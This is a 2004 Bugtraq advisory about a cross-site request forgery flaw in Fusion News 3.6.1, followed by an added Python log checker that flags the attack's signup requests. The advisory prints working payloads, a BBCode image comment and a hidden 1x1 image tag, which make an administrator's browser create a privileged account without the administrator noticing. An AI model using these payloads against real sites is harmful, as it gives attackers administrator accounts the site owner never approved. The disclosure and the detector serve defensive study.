
List:       bugtraq
Subject:    Fusion News Yet Another Unauthorized Account Addition Vulnerability
From:       Joseph Moniz <r3d_5pik3 () yahoo ! com>
Date:       2004-07-29 22:52:24
Message-ID: 20040729225224.24449.qmail () www ! securityfocus ! com



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product:  Fusion News
Vendor:  FusionPHP (fusionphp.net)
Affected Versions:  3.6.1 and lower
Description:  A widely used news management system
Vulnerabilities:  Unauthorized Account Addition Vulnerability
Date:  July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Unauthorized Account Addition
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)

OK, this is basically all due to the vendor being really lazy and not SUFFICIENTLY
patching the previous similar exploit. Basically all the vendor did to stop the last
vulnerability was make it so you had to be signed on as an admin to create an account,
and that is simply just not enough.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Unauthorized Account Addition ] oOoOoOo(O_o)

Unlike the previous related vulnerability, with this one you can't simply type
something into the URL bar and press enter. All you have to do is make sure the admin
is logged on, so that the request is made by the admin's browser with the admin's
session, then do one of the following (the first is probably the most reliable for an
attacker).

1.) Leave them a comment with an [img] bbcode set like this:

[img]http://vulnrable.com/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1[/img]


2.) As long as the admin has RECENTLY logged on, you could exploit it remotely by
convincing him to go to a site that has a malicious <img> tag such as the following:

<img src="http://free.hostultra.com/~negativebliss/phpfusion/index.php?id=signup&username=teh-r3d-1&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1" size="1" width="1">

That would make a 1x1 pixel image, meaning the admin wouldn't even know what happened.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)

Give me 5 seconds to press the send button to the vendor ;)

-r3d5pik3
(o_O)oOoOoOo [ ph33r t3h r3d 1z !!! ] oOoOoOo(O_o)
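
A log check for the request pattern described above, as an added example that is not part of the original advisory: it flags GET requests that carry the signup parameters in the query string and labels where the Referer points. The combined access log format, the hostnames and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed: Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

def find_signup_gets(lines, site_host):
    """Return GET requests that carry the advisory's signup parameters."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if query.get("id") != ["signup"]:
            continue
        if not {"username", "password"}.issubset(query):
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        if ref_host is None:
            origin = "no-referer"
        elif ref_host == site_host.lower():
            origin = "same-site"    # e.g. an [img] tag posted in a comment
        else:
            origin = "cross-site"   # e.g. an <img> tag on another site
        hits.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                     "username": query["username"][0], "origin": origin})
    return hits

# Constructed sample lines (documentation IPs and example hostnames).
_Q = "id=signup&username={}&email=a%40example.com&password=x&icon=&le=3&timeoffset=1"
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jul/2004:22:40:01 +0000] "GET /news/index.php?'
    + _Q.format("testuser1") + ' HTTP/1.1" 200 512 "http://news.example.com/news/" "Mozilla/4.0"',
    '192.0.2.10 - - [29/Jul/2004:22:41:17 +0000] "GET /news/index.php?'
    + _Q.format("testuser2") + ' HTTP/1.1" 200 512 "http://other.example.net/page.html" "Mozilla/4.0"',
    '198.51.100.7 - - [29/Jul/2004:22:42:00 +0000] "GET /news/index.php HTTP/1.1" 200 4096 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [29/Jul/2004:22:43:30 +0000] "POST /news/index.php?id=signup HTTP/1.1" 200 512 "http://news.example.com/news/" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in find_signup_gets(SAMPLE_LOG, "news.example.com"):
        print(hit)
```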

